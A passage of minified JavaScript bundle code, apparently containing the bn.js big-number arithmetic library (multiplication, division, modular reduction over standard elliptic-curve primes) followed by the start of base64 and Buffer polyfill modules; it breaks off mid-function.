w(z,l,f){f.negative=l.negative^z.negative,f.length=z.length+l.length;for(var A=0,v=0,P=0;P<f.length-1;P++){var G=v;v=0;for(var X=67108863&A,L=Math.min(P,l.length-1),h=Math.max(0,P-z.length+1);h<=L;h++){var ue=(0|z.words[P-h])*(0|l.words[h]),Ie=67108863&ue;X=67108863&(Ie=Ie+X|0),v+=(G=(G=G+(ue/67108864|0)|0)+(Ie>>>26)|0)>>>26,G&=67108863}f.words[P]=X,A=G,G=v}return 0!==A?f.words[P]=A:f.length--,f.strip()}(this,l,f):x(this,l,f),A},S.prototype.makeRBT=function(l){for(var f=new Array(l),A=I.prototype._countBits(l)-1,v=0;v<l;v++)f[v]=this.revBin(v,A,l);return f},S.prototype.revBin=function(l,f,A){if(0===l||l===A-1)return l;for(var v=0,P=0;P<f;P++)v|=(1&l)<<f-P-1,l>>=1;return v},S.prototype.permute=function(l,f,A,v,P,G){for(var X=0;X<G;X++)v[X]=f[l[X]],P[X]=A[l[X]]},S.prototype.transform=function(l,f,A,v,P,G){this.permute(G,l,f,A,v,P);for(var X=1;X<P;X<<=1)for(var L=X<<1,h=Math.cos(2*Math.PI/L),R=Math.sin(2*Math.PI/L),J=0;J<P;J+=L)for(var Z=h,ue=R,Ie=0;Ie<X;Ie++){var Ae=A[J+Ie],Ue=v[J+Ie],Xe=A[J+Ie+X],He=v[J+Ie+X],Be=Z*Xe-ue*He;He=Z*He+ue*Xe,A[J+Ie]=Ae+(Xe=Be),v[J+Ie]=Ue+He,A[J+Ie+X]=Ae-Xe,v[J+Ie+X]=Ue-He,Ie!==L&&(Be=h*Z-R*ue,ue=h*ue+R*Z,Z=Be)}},S.prototype.guessLen13b=function(l,f){var A=1|Math.max(f,l),v=1&A,P=0;for(A=A/2|0;A;A>>>=1)P++;return 1<<P+1+v},S.prototype.conjugate=function(l,f,A){if(!(A<=1))for(var v=0;v<A/2;v++){var P=l[v];l[v]=l[A-v-1],l[A-v-1]=P,P=f[v],f[v]=-f[A-v-1],f[A-v-1]=-P}},S.prototype.normalize13b=function(l,f){for(var A=0,v=0;v<f/2;v++){var P=8192*Math.round(l[2*v+1]/f)+Math.round(l[2*v]/f)+A;l[v]=67108863&P,A=P<67108864?0:P/67108864|0}return l},S.prototype.convert13b=function(l,f,A,v){for(var P=0,G=0;G<f;G++)A[2*G]=8191&(P+=0|l[G]),A[2*G+1]=8191&(P>>>=13),P>>>=13;for(G=2*f;G<v;++G)A[G]=0;$(0===P),$(0==(-8192&P))},S.prototype.stub=function(l){for(var f=new Array(l),A=0;A<l;A++)f[A]=0;return f},S.prototype.mulp=function(l,f,A){var v=2*this.guessLen13b(l.length,f.length),P=this.makeRBT(v),G=this.stub(v),X=new Array(v),L=new Array(v),h=new Array(v),R=new Array(v),J=new Array(v),Z=new Array(v),ue=A.words;ue.length=v,this.convert13b(l.words,l.length,X,v),this.convert13b(f.words,f.length,R,v),this.transform(X,G,L,h,v,P),this.transform(R,G,J,Z,v,P);for(var Ie=0;Ie<v;Ie++){var Ae=L[Ie]*J[Ie]-h[Ie]*Z[Ie];h[Ie]=L[Ie]*Z[Ie]+h[Ie]*J[Ie],L[Ie]=Ae}return this.conjugate(L,h,v),this.transform(L,h,ue,G,v,P),this.conjugate(ue,G,v),this.normalize13b(ue,v),A.negative=l.negative^f.negative,A.length=l.length+f.length,A.strip()},I.prototype.mul=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),this.mulTo(l,f)},I.prototype.mulf=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),x(this,l,f)},I.prototype.imul=function(l){return this.clone().mulTo(l,this)},I.prototype.imuln=function(l){$("number"==typeof l),$(l<67108864);for(var f=0,A=0;A<this.length;A++){var v=(0|this.words[A])*l,P=(67108863&v)+(67108863&f);f>>=26,f+=v/67108864|0,f+=P>>>26,this.words[A]=67108863&P}return 0!==f&&(this.words[A]=f,this.length++),this},I.prototype.muln=function(l){return this.clone().imuln(l)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(l){var f=function M(z){for(var l=new Array(z.bitLength()),f=0;f<l.length;f++){var v=f%26;l[f]=(z.words[f/26|0]&1<<v)>>>v}return l}(l);if(0===f.length)return new I(1);for(var A=this,v=0;v<f.length&&0===f[v];v++,A=A.sqr());if(++v<f.length)for(var P=A.sqr();v<f.length;v++,P=P.sqr())0!==f[v]&&(A=A.mul(P));return A},I.prototype.iushln=function(l){$("number"==typeof l&&l>=0);var P,f=l%26,A=(l-f)/26,v=67108863>>>26-f<<26-f;if(0!==f){var G=0;for(P=0;P<this.length;P++){var X=this.words[P]&v;this.words[P]=(0|this.words[P])-X<<f|G,G=X>>>26-f}G&&(this.words[P]=G,this.length++)}if(0!==A){for(P=this.length-1;P>=0;P--)this.words[P+A]=this.words[P];for(P=0;P<A;P++)this.words[P]=0;this.length+=A}return this.strip()},I.prototype.ishln=function(l){return $(0===this.negative),this.iushln(l)},I.prototype.iushrn=function(l,f,A){var v;$("number"==typeof l&&l>=0),v=f?(f-f%26)/26:0;var P=l%26,G=Math.min((l-P)/26,this.length),X=67108863^67108863>>>P<<P,L=A;if(v-=G,v=Math.max(0,v),L){for(var h=0;h<G;h++)L.words[h]=this.words[h];L.length=G}if(0!==G)if(this.length>G)for(this.length-=G,h=0;h<this.length;h++)this.words[h]=this.words[h+G];else this.words[0]=0,this.length=1;var R=0;for(h=this.length-1;h>=0&&(0!==R||h>=v);h--){var J=0|this.words[h];this.words[h]=R<<26-P|J>>>P,R=J&X}return L&&0!==R&&(L.words[L.length++]=R),0===this.length&&(this.words[0]=0,this.length=1),this.strip()},I.prototype.ishrn=function(l,f,A){return $(0===this.negative),this.iushrn(l,f,A)},I.prototype.shln=function(l){return this.clone().ishln(l)},I.prototype.ushln=function(l){return this.clone().iushln(l)},I.prototype.shrn=function(l){return this.clone().ishrn(l)},I.prototype.ushrn=function(l){return this.clone().iushrn(l)},I.prototype.testn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return!(this.length<=A||!(this.words[A]&1<<f))},I.prototype.imaskn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return $(0===this.negative,"imaskn works only with positive numbers"),this.length<=A?this:(0!==f&&A++,this.length=Math.min(A,this.length),0!==f&&(this.words[this.length-1]&=67108863^67108863>>>f<<f),this.strip())},I.prototype.maskn=function(l){return this.clone().imaskn(l)},I.prototype.iaddn=function(l){return $("number"==typeof l),$(l<67108864),l<0?this.isubn(-l):0!==this.negative?1===this.length&&(0|this.words[0])<l?(this.words[0]=l-(0|this.words[0]),this.negative=0,this):(this.negative=0,this.isubn(l),this.negative=1,this):this._iaddn(l)},I.prototype._iaddn=function(l){this.words[0]+=l;for(var f=0;f<this.length&&this.words[f]>=67108864;f++)this.words[f]-=67108864,f===this.length-1?this.words[f+1]=1:this.words[f+1]++;return this.length=Math.max(this.length,f+1),this},I.prototype.isubn=function(l){if($("number"==typeof l),$(l<67108864),l<0)return this.iaddn(-l);if(0!==this.negative)return this.negative=0,this.iaddn(l),this.negative=1,this;if(this.words[0]-=l,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var f=0;f<this.length&&this.words[f]<0;f++)this.words[f]+=67108864,this.words[f+1]-=1;return this.strip()},I.prototype.addn=function(l){return this.clone().iaddn(l)},I.prototype.subn=function(l){return this.clone().isubn(l)},I.prototype.iabs=function(){return this.negative=0,this},I.prototype.abs=function(){return this.clone().iabs()},I.prototype._ishlnsubmul=function(l,f,A){var P;this._expand(l.length+A);var G,X=0;for(P=0;P<l.length;P++){G=(0|this.words[P+A])+X;var L=(0|l.words[P])*f;X=((G-=67108863&L)>>26)-(L/67108864|0),this.words[P+A]=67108863&G}for(;P<this.length-A;P++)X=(G=(0|this.words[P+A])+X)>>26,this.words[P+A]=67108863&G;if(0===X)return this.strip();for($(-1===X),X=0,P=0;P<this.length;P++)X=(G=-(0|this.words[P])+X)>>26,this.words[P]=67108863&G;return this.negative=1,this.strip()},I.prototype._wordDiv=function(l,f){var A,v=this.clone(),P=l,G=0|P.words[P.length-1];0!=(A=26-this._countBits(G))&&(P=P.ushln(A),v.iushln(A),G=0|P.words[P.length-1]);var h,L=v.length-P.length;if("mod"!==f){(h=new I(null)).length=L+1,h.words=new Array(h.length);for(var R=0;R<h.length;R++)h.words[R]=0}var J=v.clone()._ishlnsubmul(P,1,L);0===J.negative&&(v=J,h&&(h.words[L]=1));for(var Z=L-1;Z>=0;Z--){var ue=67108864*(0|v.words[P.length+Z])+(0|v.words[P.length+Z-1]);for(ue=Math.min(ue/G|0,67108863),v._ishlnsubmul(P,ue,Z);0!==v.negative;)ue--,v.negative=0,v._ishlnsubmul(P,1,Z),v.isZero()||(v.negative^=1);h&&(h.words[Z]=ue)}return h&&h.strip(),v.strip(),"div"!==f&&0!==A&&v.iushrn(A),{div:h||null,mod:v}},I.prototype.divmod=function(l,f,A){return $(!l.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===l.negative?(G=this.neg().divmod(l,f),"mod"!==f&&(v=G.div.neg()),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.iadd(l)),{div:v,mod:P}):0===this.negative&&0!==l.negative?(G=this.divmod(l.neg(),f),"mod"!==f&&(v=G.div.neg()),{div:v,mod:G.mod}):0!=(this.negative&l.negative)?(G=this.neg().divmod(l.neg(),f),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.isub(l)),{div:G.div,mod:P}):l.length>this.length||this.cmp(l)<0?{div:new I(0),mod:this}:1===l.length?"div"===f?{div:this.divn(l.words[0]),mod:null}:"mod"===f?{div:null,mod:new I(this.modn(l.words[0]))}:{div:this.divn(l.words[0]),mod:new I(this.modn(l.words[0]))}:this._wordDiv(l,f);var v,P,G},I.prototype.div=function(l){return this.divmod(l,"div",!1).div},I.prototype.mod=function(l){return this.divmod(l,"mod",!1).mod},I.prototype.umod=function(l){return this.divmod(l,"mod",!0).mod},I.prototype.divRound=function(l){var f=this.divmod(l);if(f.mod.isZero())return f.div;var A=0!==f.div.negative?f.mod.isub(l):f.mod,v=l.ushrn(1),P=l.andln(1),G=A.cmp(v);return G<0||1===P&&0===G?f.div:0!==f.div.negative?f.div.isubn(1):f.div.iaddn(1)},I.prototype.modn=function(l){$(l<=67108863);for(var f=(1<<26)%l,A=0,v=this.length-1;v>=0;v--)A=(f*A+(0|this.words[v]))%l;return A},I.prototype.idivn=function(l){$(l<=67108863);for(var f=0,A=this.length-1;A>=0;A--){var v=(0|this.words[A])+67108864*f;this.words[A]=v/l|0,f=v%l}return this.strip()},I.prototype.divn=function(l){return this.clone().idivn(l)},I.prototype.egcd=function(l){$(0===l.negative),$(!l.isZero());var f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=new I(0),X=new I(1),L=0;f.isEven()&&A.isEven();)f.iushrn(1),A.iushrn(1),++L;for(var h=A.clone(),R=f.clone();!f.isZero();){for(var J=0,Z=1;0==(f.words[0]&Z)&&J<26;++J,Z<<=1);if(J>0)for(f.iushrn(J);J-- >0;)(v.isOdd()||P.isOdd())&&(v.iadd(h),P.isub(R)),v.iushrn(1),P.iushrn(1);for(var ue=0,Ie=1;0==(A.words[0]&Ie)&&ue<26;++ue,Ie<<=1);if(ue>0)for(A.iushrn(ue);ue-- >0;)(G.isOdd()||X.isOdd())&&(G.iadd(h),X.isub(R)),G.iushrn(1),X.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(G),P.isub(X)):(A.isub(f),G.isub(v),X.isub(P))}return{a:G,b:X,gcd:A.iushln(L)}},I.prototype._invmp=function(l){$(0===l.negative),$(!l.isZero());var J,f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=A.clone();f.cmpn(1)>0&&A.cmpn(1)>0;){for(var X=0,L=1;0==(f.words[0]&L)&&X<26;++X,L<<=1);if(X>0)for(f.iushrn(X);X-- >0;)v.isOdd()&&v.iadd(G),v.iushrn(1);for(var h=0,R=1;0==(A.words[0]&R)&&h<26;++h,R<<=1);if(h>0)for(A.iushrn(h);h-- >0;)P.isOdd()&&P.iadd(G),P.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(P)):(A.isub(f),P.isub(v))}return(J=0===f.cmpn(1)?v:P).cmpn(0)<0&&J.iadd(l),J},I.prototype.gcd=function(l){if(this.isZero())return l.abs();if(l.isZero())return this.abs();var f=this.clone(),A=l.clone();f.negative=0,A.negative=0;for(var v=0;f.isEven()&&A.isEven();v++)f.iushrn(1),A.iushrn(1);for(;;){for(;f.isEven();)f.iushrn(1);for(;A.isEven();)A.iushrn(1);var P=f.cmp(A);if(P<0){var G=f;f=A,A=G}else if(0===P||0===A.cmpn(1))break;f.isub(A)}return A.iushln(v)},I.prototype.invm=function(l){return this.egcd(l).a.umod(l)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(l){return this.words[0]&l},I.prototype.bincn=function(l){$("number"==typeof l);var f=l%26,A=(l-f)/26,v=1<<f;if(this.length<=A)return this._expand(A+1),this.words[A]|=v,this;for(var P=v,G=A;0!==P&&G<this.length;G++){var X=0|this.words[G];P=(X+=P)>>>26,this.words[G]=X&=67108863}return 0!==P&&(this.words[G]=P,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(l){var A,f=l<0;if(0!==this.negative&&!f)return-1;if(0===this.negative&&f)return 1;if(this.strip(),this.length>1)A=1;else{f&&(l=-l),$(l<=67108863,"Number is too big");var v=0|this.words[0];A=v===l?0:v<l?-1:1}return 0!==this.negative?0|-A:A},I.prototype.cmp=function(l){if(0!==this.negative&&0===l.negative)return-1;if(0===this.negative&&0!==l.negative)return 1;var f=this.ucmp(l);return 0!==this.negative?0|-f:f},I.prototype.ucmp=function(l){if(this.length>l.length)return 1;if(this.length<l.length)return-1;for(var f=0,A=this.length-1;A>=0;A--){var v=0|this.words[A],P=0|l.words[A];if(v!==P){v<P?f=-1:v>P&&(f=1);break}}return f},I.prototype.gtn=function(l){return 1===this.cmpn(l)},I.prototype.gt=function(l){return 1===this.cmp(l)},I.prototype.gten=function(l){return this.cmpn(l)>=0},I.prototype.gte=function(l){return this.cmp(l)>=0},I.prototype.ltn=function(l){return-1===this.cmpn(l)},I.prototype.lt=function(l){return-1===this.cmp(l)},I.prototype.lten=function(l){return this.cmpn(l)<=0},I.prototype.lte=function(l){return this.cmp(l)<=0},I.prototype.eqn=function(l){return 0===this.cmpn(l)},I.prototype.eq=function(l){return 0===this.cmp(l)},I.red=function(l){return new le(l)},I.prototype.toRed=function(l){return $(!this.red,"Already a number in reduction context"),$(0===this.negative,"red works only with positives"),l.convertTo(this)._forceRed(l)},I.prototype.fromRed=function(){return $(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(l){return this.red=l,this},I.prototype.forceRed=function(l){return $(!this.red,"Already a number in reduction context"),this._forceRed(l)},I.prototype.redAdd=function(l){return $(this.red,"redAdd works only with red numbers"),this.red.add(this,l)},I.prototype.redIAdd=function(l){return $(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,l)},I.prototype.redSub=function(l){return $(this.red,"redSub works only with red numbers"),this.red.sub(this,l)},I.prototype.redISub=function(l){return $(this.red,"redISub works only with red numbers"),this.red.isub(this,l)},I.prototype.redShl=function(l){return $(this.red,"redShl works only with red numbers"),this.red.shl(this,l)},I.prototype.redMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.mul(this,l)},I.prototype.redIMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.imul(this,l)},I.prototype.redSqr=function(){return $(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return $(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return $(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return $(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return $(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(l){return $(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function U(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){U.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){U.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){U.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){U.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else $(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}U.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},U.prototype.ireduce=function(l){var A,f=l;do{this.split(f,this.tmp),A=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(A>this.n);var v=A<this.n?-1:f.ucmp(this.p);return 0===v?(f.words[0]=0,f.length=1):v>0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},U.prototype.split=function(l,f){l.iushrn(this.n,0,f)},U.prototype.imulK=function(l){return l.imul(this.k)},ae(K,U),K.prototype.split=function(l,f){for(var A=4194303,v=Math.min(l.length,9),P=0;P<v;P++)f.words[P]=l.words[P];if(f.length=v,l.length<=9)return l.words[0]=0,void(l.length=1);var G=l.words[9];for(f.words[f.length++]=G&A,P=10;P<l.length;P++){var X=0|l.words[P];l.words[P-10]=(X&A)<<4|G>>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,A=0;A<l.length;A++){var v=0|l.words[A];l.words[A]=67108863&(f+=977*v),f=64*v+(f/67108864|0)}return 0===l.words[l.length-1]&&(l.length--,0===l.words[l.length-1]&&l.length--),l},ae(ee,U),ae(se,U),ae(ve,U),ve.prototype.imulK=function(l){for(var f=0,A=0;A<l.length;A++){var v=19*(0|l.words[A])+f,P=67108863&v;v>>>=26,l.words[A]=P,f=v}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){$(0===l.negative,"red works only with positives"),$(l.red,"red works only with red numbers")},le.prototype._verify2=function(l,f){$(0==(l.negative|f.negative),"red works only with positives"),$(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var A=l.add(f);return A.cmp(this.m)>=0&&A.isub(this.m),A._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var A=l.iadd(f);return A.cmp(this.m)>=0&&A.isub(this.m),A},le.prototype.sub=function(l,f){this._verify2(l,f);var A=l.sub(f);return A.cmpn(0)<0&&A.iadd(this.m),A._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var A=l.isub(f);return A.cmpn(0)<0&&A.iadd(this.m),A},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if($(f%2==1),3===f){var A=this.m.add(new I(1)).iushrn(2);return this.pow(l,A)}for(var v=this.m.subn(1),P=0;!v.isZero()&&0===v.andln(1);)P++,v.iushrn(1);$(!v.isZero());var G=new I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,v),J=this.pow(l,v.addn(1).iushrn(1)),Z=this.pow(l,v),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();$(Ae<ue);var Ue=this.pow(R,new I(1).iushln(ue-Ae-1));J=J.redMul(Ue),R=Ue.redSqr(),Z=Z.redMul(R),ue=Ae}return J},le.prototype.invm=function(l){var f=l._invmp(this.m);return 0!==f.negative?(f.negative=0,this.imod(f).redNeg()):this.imod(f)},le.prototype.pow=function(l,f){if(f.isZero())return new I(1).toRed(this);if(0===f.cmpn(1))return l.clone();var v=new Array(16);v[0]=new I(1).toRed(this),v[1]=l;for(var P=2;P<v.length;P++)v[P]=this.mul(v[P-1],l);var G=v[0],X=0,L=0,h=f.bitLength()%26;for(0===h&&(h=26),P=f.length-1;P>=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==v[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,v[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var A=l.imul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var A=l.mul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},4594:function(Pe,we,de){var $,ie=de(5449).Buffer;$=()=>(()=>{var j={9742:(Q,F)=>{"use strict";F.byteLength=function(w){var x=p(w),O=x[1];return 3*(x[0]+O)/4-O},F.toByteArray=function(w){var x,S,z,O=p(w),U=O[0],K=O[1],ee=new b(3*(U+(z=K))/4-z),se=0,ve=K>0?U-4:U;for(S=0;S<ve;S+=4)x=g[w.charCodeAt(S)]<<18|g[w.charCodeAt(S+1)]<<12|g[w.charCodeAt(S+2)]<<6|g[w.charCodeAt(S+3)],ee[se++]=x>>16&255,ee[se++]=x>>8&255,ee[se++]=255&x;return 2===K&&(x=g[w.charCodeAt(S)]<<2|g[w.charCodeAt(S+1)]>>4,ee[se++]=255&x),1===K&&(x=g[w.charCodeAt(S)]<<10|g[w.charCodeAt(S+1)]<<4|g[w.charCodeAt(S+2)]>>2,ee[se++]=x>>8&255,ee[se++]=255&x),ee},F.fromByteArray=function(w){for(var x,S=w.length,O=S%3,U=[],K=16383,ee=0,se=S-O;ee<se;ee+=K)U.push(D(w,ee,ee+K>se?se:ee+K));return 1===O?U.push(E[(x=w[S-1])>>2]+E[x<<4&63]+"=="):2===O&&U.push(E[(x=(w[S-2]<<8)+w[S-1])>>10]+E[x>>4&63]+E[x<<2&63]+"="),U.join("")};for(var E=[],g=[],b="undefined"!=typeof Uint8Array?Uint8Array:Array,_="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",y=0,M=_.length;y<M;++y)E[y]=_[y],g[_.charCodeAt(y)]=y;function p(w){var x=w.length;if(x%4>0)throw new Error("Invalid string. Length must be a multiple of 4");var S=w.indexOf("=");return-1===S&&(S=x),[S,S===x?0:4-S%4]}function D(w,x,S){for(var U,K=[],ee=x;ee<S;ee+=3)K.push(E[(U=(w[ee]<<16&16711680)+(w[ee+1]<<8&65280)+(255&w[ee+2]))>>18&63]+E[U>>12&63]+E[U>>6&63]+E[63&U]);return K.join("")}g["-".charCodeAt(0)]=62,g["_".charCodeAt(0)]=63},8764:(Q,F,E)=>{"use strict";const g=E(9742),b=E(645),_="function"==typeof Symbol&&"function"==typeof Symbol.for?Symbol.for("nodejs.util.inspect.custom"):null;F.Buffer=p,F.SlowBuffer=function(xe){return+xe!=xe&&(xe=0),p.alloc(+xe)},F.INSPECT_MAX_BYTES=50;const y=2147483647;function M(xe){if(xe>y)throw new RangeError('The value "'+xe+'" is invalid for option "size"');const We=new Uint8Array(xe);return Object.setPrototypeOf(We,p.prototype),We}function p(xe,We,Je){if("number"==typeof xe){if("string"==typeof We)throw new TypeError('The "string" argument must be of type string. Received type number');return x(xe)}return D(xe,We,Je)}function D(xe,We,Je){if("string"==typeof xe)return function(Le,$e){if("string"==typeof $e&&""!==$e||($e="utf8"),!p.isEncoding($e))throw new TypeError("Unknown encoding: "+$e);const st=0|K(Le,$e);let xt=M(st);const pt=xt.write(Le,$e);return pt!==st&&(xt=xt.slice(0,pt)),xt}(xe,We);if(ArrayBuffer.isView(xe))return function(Le){if(Qe(Le,Uint8Array)){const $e=new Uint8Array(Le);return O($e.buffer,$e.byteOffset,$e.byteLength)}return S(Le)}(xe);if(null==xe)throw new TypeError("The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type "+typeof xe);if(Qe(xe,ArrayBuffer)||xe&&Qe(xe.buffer,ArrayBuffer)||"undefined"!=typeof SharedArrayBuffer&&(Qe(xe,SharedArrayBuffer)||xe&&Qe(xe.buffer,SharedArrayBuffer)))return O(xe,We,Je);if("number"==typeof xe)throw new TypeError('The "value" argument must not be of type number. Received type number');const Oe=xe.valueOf&&xe.valueOf();if(null!=Oe&&Oe!==xe)return p.from(Oe,We,Je);const Te=function(Le){if(p.isBuffer(Le)){const $e=0|U(Le.length),st=M($e);return 0===st.length||Le.copy(st,0,0,$e),st}return void 0!==Le.length?"number"!=typeof Le.length||ht(Le.length)?M(0):S(Le):"Buffer"===Le.type&&Array.isArray(Le.data)?S(Le.data):void 0}(xe);if(Te)return Te;if("undefined"!=typeof Symbol&&null!=Symbol.toPrimitive&&"function"==typeof xe[Symbol.toPrimitive])return p.from(xe[Symbol.toPrimitive]("string"),We,Je);throw new TypeError("The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type "+typeof xe)}function w(xe){if("number"!=typeof xe)throw new TypeError('"size" argument must be of type number');if(xe<0)throw new RangeError('The value "'+xe+'" is invalid for option "size"')}function x(xe){return w(xe),M(xe<0?0:0|U(xe))}function S(xe){const We=xe.length<0?0:0|U(xe.length),Je=M(We);for(let Oe=0;Oe<We;Oe+=1)Je[Oe]=255&xe[Oe];return Je}function O(xe,We,Je){if(We<0||xe.byteLength<We)throw new RangeError('"offset" is outside of buffer bounds');if(xe.byteLength<We+(Je||0))throw new RangeError('"length" is outside of buffer bounds');let Oe;return Oe=void 0===We&&void 0===Je?new Uint8Array(xe):void 0===Je?new Uint8Array(xe,We):new Uint8Array(xe,We,Je),Object.setPrototypeOf(Oe,p.prototype),Oe}function U(xe){if(xe>=y)throw new RangeError("Attempt to allocate Buffer larger than maximum size: 0x"+y.toString(16)+" bytes");return 0|xe}function K(xe,We){if(p.isBuffer(xe))return xe.length;if(ArrayBuffer.isView(xe)||Qe(xe,ArrayBuffer))return xe.byteLength;if("string"!=typeof xe)throw new TypeError('The "string" argument must be one of type string, Buffer, or ArrayBuffer. Received type '+typeof xe);const Je=xe.length,Oe=arguments.length>2&&!0===arguments[2];if(!Oe&&0===Je)return 0;let Te=!1;for(;;)switch(We){case"ascii":case"latin1":case"binary":return Je;case"utf8":case"utf-8":return Ke(xe).length;case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return 2*Je;case"hex":return Je>>>1;case"base64":return rt(xe).length;default:if(Te)return Oe?-1:Ke(xe).length;We=(""+We).toLowerCase(),Te=!0}}function ee(xe,We,Je){let Oe=!1;if((void 0===We||We<0)&&(We=0),We>this.length||((void 0===Je||Je>this.length)&&(Je=this.length),Je<=0)||(Je>>>=0)<=(We>>>=0))return"";for(xe||(xe="utf8");;)switch(xe){case"hex":return h(this,We,Je);case"utf8":case"utf-8":return P(this,We,Je);case"ascii":return X(this,We,Je);case"latin1":case"binary":return L(this,We,Je);case"base64":return 